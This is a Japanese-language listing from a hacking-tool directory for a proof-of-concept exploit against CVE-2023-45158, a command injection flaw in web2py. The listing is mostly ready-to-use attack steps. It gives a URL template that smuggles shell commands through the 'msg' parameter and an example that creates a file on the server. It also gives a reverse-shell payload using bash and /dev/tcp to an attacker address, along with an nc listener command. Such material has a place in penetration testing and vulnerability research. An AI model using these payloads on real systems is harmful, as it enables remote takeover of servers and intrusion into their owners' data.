Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-45158 — web2pyのコマンドインジェクション脆弱性であるCVE-2023-45158の概念実証エクスプロイト。ファイル作成やリバースシェルペイロードを含む、細工されたHTTPリクエストによるリモートコード実行を示します。 | Kitploit
ツール/GitHubGitHub/yifanzhg/cve-2023-45158
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubyifanzhg/cve-2023-45158

CVE-2023-45158

web2pyのコマンドインジェクション脆弱性であるCVE-2023-45158の概念実証エクスプロイト。ファイル作成やリバースシェルペイロードを含む、細工されたHTTPリクエストによるリモートコード実行を示します。

リポジトリを見る
4112年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-45158

手順

  1. Webサーバーを起動します
root@kitploit:~
cd web2py
python3 web2py.py
  1. URL http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27 を使用してコマンドを注入します。<IP-ADDRESS> と <YOUR-COMMAND> を各自の値に置き換えてください。

使用例

  1. サーバー上にファイルを作成します

http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27

  1. リバースシェル

攻撃者のマシンで nc -l 127.0.0.1 8080 を実行します

URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27 にアクセスします。<ATTACKER-IP> を置き換えてください。

ツールをダウンロード